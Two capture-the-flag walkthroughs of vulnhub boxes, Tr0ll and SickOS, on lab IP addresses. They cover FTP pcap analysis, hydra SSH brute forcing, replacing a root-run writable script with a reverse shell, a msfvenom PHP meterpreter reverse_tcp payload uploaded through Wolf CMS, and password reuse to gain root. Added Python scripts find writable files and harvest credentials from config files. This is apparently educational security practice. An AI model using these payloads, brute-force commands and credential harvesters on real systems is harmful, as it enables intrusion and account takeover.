tr0ll

Okay, this is a new box, so we start by running nmap against it.
There are three ports open: 21, 22 and 80.
The website just trolls us.
The FTP server allows anonymous login, so we can check if there is anything there.
There is a file named lol.pcap. This is interesting.
The pcap shows someone connecting to the FTP server and downloading super_secret.txt.
Since FTP is not encrypted, we can see the content of the downloaded file :)

In Wireshark go to Statistics > Conversations > TCP.
You can see there are 4 TCP conversations; the one we are interested in is the 3rd, the data connection carrying the file. Select it and follow the TCP stream to see the payload.

This gives us the content of the file:
Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol :P

Sucks, you were so close… gotta TRY HARDER!
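The same extraction can be done without Wireshark. The script below is an added example written for this write-up, not a file from the box: it parses a libpcap file, groups segments into TCP conversations in first-seen order (the same order as the Conversations dialog), reassembles each direction by sequence number so out-of-order and retransmitted segments come out right, and returns the payload of every conversation that is not the port 21 control channel, which with FTP is where the file itself travels. The capture it runs on is constructed in memory and labelled as such; lol.pcap is not included.

```python
"""Reassemble the TCP conversations in a libpcap file without Wireshark.

Added example for this write-up (not the box's files): the capture parsed at the
bottom is constructed in memory so it runs offline; lol.pcap itself is not included.
"""
import struct
from collections import defaultdict

ETH_IPV4 = 0x0800
IP_TCP = 6


def read_pcap(data):
    """Yield raw Ethernet frames from libpcap bytes (magic 0xa1b2c3d4, link type 1)."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a libpcap file (pcapng is not handled)")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("only Ethernet link type is handled")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "I", data[off + 8:off + 12])[0]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return (src, sport, dst, dport, seq, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_IPV4:
        return None
    ip = frame[14:]
    if ip[9] != IP_TCP:
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]  # excludes any Ethernet padding
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    data_off = (tcp[12] >> 4) * 4
    return src, sport, dst, dport, seq, tcp[data_off:]


def tcp_conversations(pcap_bytes):
    """[(endpoint_a, endpoint_b, {(src, dst): bytes})] in first-seen order.

    Each direction is rebuilt by sequence number; a retransmitted segment
    overwrites the same sequence slot instead of duplicating data.
    """
    segments = defaultdict(lambda: defaultdict(dict))
    order = []
    for frame in read_pcap(pcap_bytes):
        parsed = parse_tcp(frame)
        if parsed is None:
            continue
        src, sport, dst, dport, seq, payload = parsed
        a, b = (src, sport), (dst, dport)
        key = tuple(sorted([a, b]))
        if key not in segments:
            order.append(key)
        conv = segments[key]
        if payload:
            conv[(a, b)][seq] = payload
    result = []
    for key in order:
        streams = {d: b"".join(p[s] for s in sorted(p)) for d, p in segments[key].items()}
        result.append((key[0], key[1], streams))
    return result


def ftp_data_streams(pcap_bytes):
    """Payloads of every conversation that is not the FTP control channel (port 21):
    in both active and passive FTP the file travels on a separate data connection."""
    found = []
    for a, b, streams in tcp_conversations(pcap_bytes):
        if 21 in (a[1], b[1]):
            continue
        found.extend((src, dst, data) for (src, dst), data in streams.items() if data)
    return found


# --- constructed sample capture (not lol.pcap) -------------------------------
SECRET = b"constructed sample file content\nTRY HARDER!\n"


def _frame(src, sport, dst, dport, seq, payload):
    """Minimal Ethernet/IPv4/TCP frame; checksums are left zero, which the parser ignores."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IP_TCP, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    return b"\x00" * 12 + struct.pack("!H", ETH_IPV4) + ip


def sample_capture():
    """Control channel plus a data channel whose segments arrive out of order,
    one of them retransmitted, to exercise the reassembly."""
    c, s = "192.168.0.10", "192.168.0.59"
    part1, part2 = SECRET[:20], SECRET[20:]
    frames = [
        _frame(c, 40001, s, 21, 1, b"RETR super_secret.txt\r\n"),
        _frame(s, 21, c, 40001, 1, b"150 Opening BINARY mode data connection\r\n"),
        _frame(s, 20, c, 40002, 1 + len(part1), part2),
        _frame(s, 20, c, 40002, 1, part1),
        _frame(s, 20, c, 40002, 1, part1),
    ]
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    records = b"".join(struct.pack("<IIII", 0, i, len(f), len(f)) + f for i, f in enumerate(frames))
    return header + records


if __name__ == "__main__":
    for src, dst, data in ftp_data_streams(sample_capture()):
        print(f"{src} -> {dst}: {data!r}")
```

Point it at a real file with `ftp_data_streams(open("lol.pcap", "rb").read())`. Keying conversations on the sorted endpoint pair is what makes the two directions of one connection land in the same entry; the control channel is skipped by port number only, so a data connection that happens to use port 21 on the client side would be missed, which is acceptable for a quick triage but worth knowing.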
We need to find the sup3rs3cr3tdirlol directory.
Browse to http://192.168.0.59/sup3rs3cr3tdirlol/
From there you can download a 32-bit executable named roflmao and run it. Rather than executing an unknown binary, running strings on it is enough to see the message.
When the program is run it prints: Find address 0x0856BF to proceed
Normally this would be a memory address, but since we cannot read memory on the target it must be something else.
It could be a web path!
Browsing to http://192.168.0.59/0x0856BF/
gives us 2 folders: Good_luck and this_folder_contains_the_password.
The first gives us a list of usernames:
maleus
ps-aux
felux
Eagle11
genphlux <-- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

The second contains a file named Pass.txt containing Good_job_:).
Since this is a troll machine we need to take this literally: the folder "contains the password", and what it contains is a file named Pass.txt, so the password may be the file name itself rather than its content.
I created two files, one with the list of users and one with the candidate passwords (Pass.txt and Good_job_:)).

hydra -L user -P password -V 192.168.0.59 ssh -t 1

Brute-forcing with hydra shows the real SSH credentials are overflow / Pass.txt:
[22][ssh] host: 192.168.0.59 login: overflow password: Pass.txt
Now we need to do a lot of enumeration. The best guide I have is from g0tmi1k:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
By checking all the config files, I finally came across something that looked strange.
In /lib/log there was a script named cleaner.py; this is why our files in /tmp keep getting deleted.
This file is writable by anyone, and root executes it periodically to clean the /tmp directory, so whatever we write into it runs as root.
I used this Python reverse shell to get a shell as root:
https://www.trustedsec.com/files/RevShell_PoC_v1.py
I just replaced cleaner.py with this script and waited for root to run it, which gave me a root reverse shell :P
You just need to listen for the incoming connection like this:

nc -lnvp 443
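The check that finds a file like cleaner.py, as an added example written for this write-up rather than anything from the box: walk the filesystem and report regular files that are world-writable, or that sit in a world-writable directory without the sticky bit (there a 644 root-owned script can still be unlinked and replaced). The directory tree it scans is constructed in a temporary directory so the script runs anywhere.

```python
"""Find files an unprivileged user could modify or replace, the check that turns up
/lib/log/cleaner.py. Added example (not the box's tooling); the tree it scans is built
in a temporary directory so it runs anywhere.
"""
import os
import stat
import tempfile


def writable_findings(root):
    """Return (relative path, mode, uid, reasons) for regular files under root that are
    world-writable, or that live in a world-writable directory without the sticky bit
    (there the file can be unlinked and replaced even if its own mode is 644).
    Symlinked directories are not followed, to avoid loops and false hits."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = sorted(d for d in dirnames if not os.path.islink(os.path.join(dirpath, d)))
        try:
            dmode = os.lstat(dirpath).st_mode
        except OSError:
            continue
        replaceable = bool(dmode & stat.S_IWOTH) and not (dmode & stat.S_ISVTX)
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            reasons = []
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if replaceable:
                reasons.append("parent dir world-writable without sticky bit")
            if reasons:
                findings.append((os.path.relpath(path, root),
                                 oct(stat.S_IMODE(st.st_mode)), st.st_uid, reasons))
    return findings


def build_sample_tree():
    """Constructed layout: a 777 cleaner script, a 755 script inside a 777 directory,
    a normal /etc file, and a file inside a sticky /tmp (present but not replaceable)."""
    root = tempfile.mkdtemp(prefix="privesc-demo-")
    layout = {  # relative path: (file mode, parent directory mode)
        "lib/log/cleaner.py": (0o777, 0o755),
        "opt/scripts/backup.sh": (0o755, 0o777),
        "etc/passwd": (0o644, 0o755),
        "tmp/session.lock": (0o644, 0o1777),
    }
    for rel, (fmode, dmode) in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, fmode)
        os.chmod(os.path.dirname(path), dmode)
    return root


if __name__ == "__main__":
    for rel, mode, uid, why in writable_findings(build_sample_tree()):
        print(f"{mode} uid={uid} {rel}: {', '.join(why)}")
```

On a target without Python the one-liner `find / -type f -perm -o+w ! -path "/proc/*" 2>/dev/null` covers the first case; the sticky-bit test is what keeps /tmp out of the results. A writable file is only a privilege escalation if root actually executes it, so confirm that before replacing anything (system and user crontabs, /etc/cron*, or simply watching the process list), and note that the hit list from a real box is long enough that filtering on root ownership is usually the next step.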

Since you are root you can read the content of /root/proof.txt:
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc


SickOS

I hacked the SickOS VM from vulnhub.com. Here is how I did it.

I started by doing an nmap scan of the box.

There is a Squid proxy running on the box.
Squid is an HTTP proxy server, so let's configure our browser to go through it.
Once the proxy is set you can browse to the real website at http://192.168.101.229/ . The reason for this is that the web server is not reachable directly from outside; by going through the box's own proxy we can reach it.

http://192.168.101.229/robots.txt
The robots.txt lists a path called /wolfcms/.
Naturally we check on Exploit-DB whether there is a vulnerable version that can help us attack the system.
Exploit-DB Exploit
In the exploit I saw the path to the admin web panel:
"GET {$path}/?/admin/plugin/file_manager HTTP/1.1\r\n";
So we browse to http://192.168.101.229/wolfcms/?/admin/
We get a login page.
I googled the default password for Wolf CMS, which is admin / admin.
In the web application there is a way to upload a file.

Let's generate a PHP meterpreter so that we get shell access on the system.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.101.3 LPORT=443 -o phpmeter.php

Upload phpmeter.php through the file manager and start a matching handler first (in msfconsole: use exploit/multi/handler, set payload php/meterpreter/reverse_tcp, with the same LHOST and LPORT).
Then fetch it through the proxy at http://192.168.101.229/public/phpmeter.php
This gives us a reverse shell as www-data. Upgrade it to a proper TTY with:

python -c 'import pty;pty.spawn("/bin/bash")'

From this shell we can read the configuration of the web application, including the root password for MySQL.
In /var/www/wolfcms/config.php we can see the database configuration:

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

So the root password for the database is john@123.
By doing some enumeration on the system we can see there is an additional user named sickos; we can read /etc/passwd or ls /home/ to find it.
People tend to reuse their passwords, so we can try to log in as the sickos user:
su sickos with password john@123
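Pulling the database password out of config.php and trying it against local accounts is the generalisable step here. The script below is an added example written for this write-up, not part of the box or of Wolf CMS: it walks a directory tree, scans files with config-like names for secret-looking assignments in PHP define() calls, PHP variables and key=value or key: value lines, and returns the unique values in discovery order, which is the list to feed to su or ssh for the other users. The files it scans are constructed in a temporary directory; the values in them are placeholders, not the box's.

```python
"""Harvest credentials from application config files and list the unique values
worth trying for password reuse against other local accounts.
Added example (not the box's files); the files it scans are constructed in a temp dir.
"""
import os
import re
import tempfile

CONFIG_SUFFIXES = (".php", ".ini", ".conf", ".cnf", ".env", ".yml", ".yaml",
                   ".json", ".xml", ".properties")
# Deliberately narrow key filter; widen it (e.g. "key") at the cost of more noise.
SECRET_WORD = r"\w*(?:pass|pwd|secret|token)\w*"
PATTERNS = [
    # PHP: define('DB_PASS', 'value');
    re.compile(r"define\(\s*['\"](" + SECRET_WORD + r")['\"]\s*,\s*['\"]([^'\"]*)['\"]", re.I),
    # PHP: $db_password = "value";
    re.compile(r"\$(" + SECRET_WORD + r")\s*=\s*['\"]([^'\"]*)['\"]", re.I),
    # ini / .env / yaml style: key=value or key: value
    re.compile(r"^\s*(" + SECRET_WORD + r")\s*[=:]\s*['\"]?([^'\"\s#]+)", re.I),
]


def is_config(name):
    return name.startswith(".env") or name.lower().endswith(CONFIG_SUFFIXES)


def harvest_credentials(root, max_bytes=1_000_000):
    """Return (relative file, key, value) for every secret-looking assignment found."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order
        for name in sorted(filenames):
            if not is_config(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    lines = fh.read().splitlines()
            except OSError:
                continue
            for line in lines:
                for pat in PATTERNS:
                    m = pat.search(line)
                    if m and m.group(2):
                        hits.append((os.path.relpath(path, root), m.group(1), m.group(2)))
                        break
    return hits


def reuse_candidates(hits):
    """Unique secret values in discovery order: the list to try with su or ssh."""
    seen = []
    for _, _, value in hits:
        if value not in seen:
            seen.append(value)
    return seen


def build_sample_tree():
    """Constructed files mirroring the kinds of config found under /var/www and /etc.
    Values are placeholders, not the box's real credentials."""
    root = tempfile.mkdtemp(prefix="creds-demo-")
    files = {
        "var/www/wolfcms/config.php": (
            "<?php\n// Database settings:\n"
            "define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');\n"
            "define('DB_USER', 'root');\n"
            "define('DB_PASS', 'S4mpl3-db-pass');\n"
            "define('TABLE_PREFIX', '');\n"
            "$smtp_password = \"mailpass1\";\n"
        ),
        "var/www/app/.env": "APP_DEBUG=true\nDB_PASSWORD=envsecret\n",
        "etc/app.yml": "listen: 0.0.0.0\napi_token: 'tok-123'\n",
        "etc/motd": "password is not here\n",  # no config suffix, never scanned
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    found = harvest_credentials(build_sample_tree())
    for rel, key, value in found:
        print(f"{rel}: {key} = {value}")
    print("try for reuse:", reuse_candidates(found))
```

Run it against /var/www and /etc on the box (or `/` with patience); the regular expressions skip DB_USER and DB_DSN on purpose, so pair each value back with the user name from the same file when the database itself is the target. The reuse list is deliberately small and ordered, which matters when trying it over ssh, where a lockout or a log entry per attempt is the cost of being noisy.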
Since the person who created this wasn't careful about security, this is the default account created at install time, and by default that first account is a member of sudoers.
This means we can run any command as root on the system.
We can verify what sudo allows us to run with this command:

sudo -l

User sickos may run the following commands on this host:
(ALL : ALL) ALL

This means we can get a root shell by running sudo su and entering the sickos password, john@123:
sudo su

cat /root/a0216ea4d51874464078c618298b1367.txt

If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying